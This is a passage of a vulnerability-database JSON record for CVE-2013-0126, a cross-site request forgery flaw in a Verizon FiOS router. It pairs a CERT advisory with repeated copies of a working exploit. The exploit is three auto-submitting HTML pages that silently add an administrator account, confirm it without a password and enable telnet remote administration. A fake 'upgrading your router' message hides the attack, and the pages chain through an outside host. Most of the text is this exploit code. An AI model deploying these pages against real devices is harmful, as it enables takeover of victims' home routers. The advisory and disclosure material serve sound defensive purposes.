name=\"is_diagnostics_traceroute_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/> \n</form> \n \n<script> \nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000) \n</script> \n \n</body> \n</html> \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120869/verizonfios-xsrf.txt"}], "cert": [{"lastseen": "2019-10-09T19:49:40", "bulletinFamily": "info", "description": "### Overview \n\nThe Verizon FIOS Actiontec router model MI424WR-GEN3I is susceptible to cross-site request forgery attacks. ([CWE-352](<http://cwe.mitre.org/data/definitions/352.html>))\n\n### Description \n\nThe Verizon FIOS Actiontec router model MI424WR-GEN3I is susceptible to cross-site request forgery attacks. ([CWE-352](<http://cwe.mitre.org/data/definitions/352.html>)) A remote attacker that is able to trick a user into clicking a malicious link while logged into the router may be able to compromise the router. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker that is able to trick a user into clicking a malicious link while they are logged into the router may be able to compromise the router. \n \n--- \n \n### Solution \n\nWe are currently unaware of a practical solution to this problem. Please consider the following workarounds. \n \n--- \n \n**Restrict Access**\n\nVerify the router's web interface is not Internet accessible. As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the router web interface using stolen credentials from a blocked network location. 
\n \n**Do Not Stay Logged Into the Router's Management Interface** \n \nAlways log out of the router's management interface when done using it. \n \n--- \n \n### Vendor Information\n\n278204\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Verizon\n\nNotified: February 01, 2013 Updated: March 18, 2013 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P \nTemporal | 5.5 | E:POC/RL:W/RC:UR \nEnvironmental | 4.2 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html>\n * <http://cwe.mitre.org/data/definitions/352.html>\n\n### Acknowledgements\n\nThanks to Jacob Holcomb of Independent Security Evaluators for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-0126](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0126>) \n---|--- \n**Date Public:** | 2013-03-18 \n**Date First Published:** | 2013-03-18 \n**Date Last Updated: ** | 2013-12-05 21:34 UTC \n**Document Revision: ** | 21 \n", "modified": "2013-12-05T21:34:00", "published": "2013-03-18T00:00:00", "id": "VU:278204", "href": "https://www.kb.cert.org/vuls/id/278204", "type": "cert", "title": "Verizon Fios Actiontec model MI424WR-GEN3I router vulnerable to cross-site request forgery", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-12T03:52:06", "bulletinFamily": "exploit", 
"description": "Verizon Fios Router version MI424WR-GEN3I suffers from a cross site request forgery vulnerability.", "modified": "2013-03-20T00:00:00", "published": "2013-03-20T00:00:00", "id": "1337DAY-ID-20537", "href": "https://0day.today/exploit/description/20537", "type": "zdt", "title": "Verizon Fios Router MI424WR-GEN3I CSRF Vulnerability", "sourceData": "# Exploit Title: Verizon Fios Router CSRF Admin Shell\r\n# Date: Discovered and reported January 2013\r\n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators\r\n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)\r\n# CVE: CVE-2013-0126\r\n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html\r\n \r\nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n \r\nExploit Code:\r\n \r\nHTML FILE #1\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input 
type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #2\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #3\r\n \r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input 
type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20537"}], "exploitdb": [{"lastseen": "2016-02-03T00:10:11", "bulletinFamily": "exploit", "description": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability. CVE-2013-0126. 
Webapps exploit for hardware platform", "modified": "2013-03-19T00:00:00", "published": "2013-03-19T00:00:00", "id": "EDB-ID:24860", "href": "https://www.exploit-db.com/exploits/24860/", "type": "exploitdb", "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "sourceData": "# Exploit Title: Verizon Fios Router CSRF Admin Shell \r\n# Date: Discovered and reported January 2013\r\n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators\r\n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)\r\n# CVE: CVE-2013-0126\r\n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html\r\n\r\nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n\r\nExploit Code:\r\n\r\nHTML FILE #1\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n\r\n<body>\r\n\r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" 
value=\"15\"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #2\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n\r\n<body>\r\n\r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #3\r\n\r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n\r\n<body>\r\n\r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input 
type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24860/"}]}